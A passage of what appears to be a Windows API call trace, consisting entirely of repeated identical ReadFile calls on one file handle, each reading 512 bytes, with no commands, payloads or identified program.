lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.471] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.471] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] 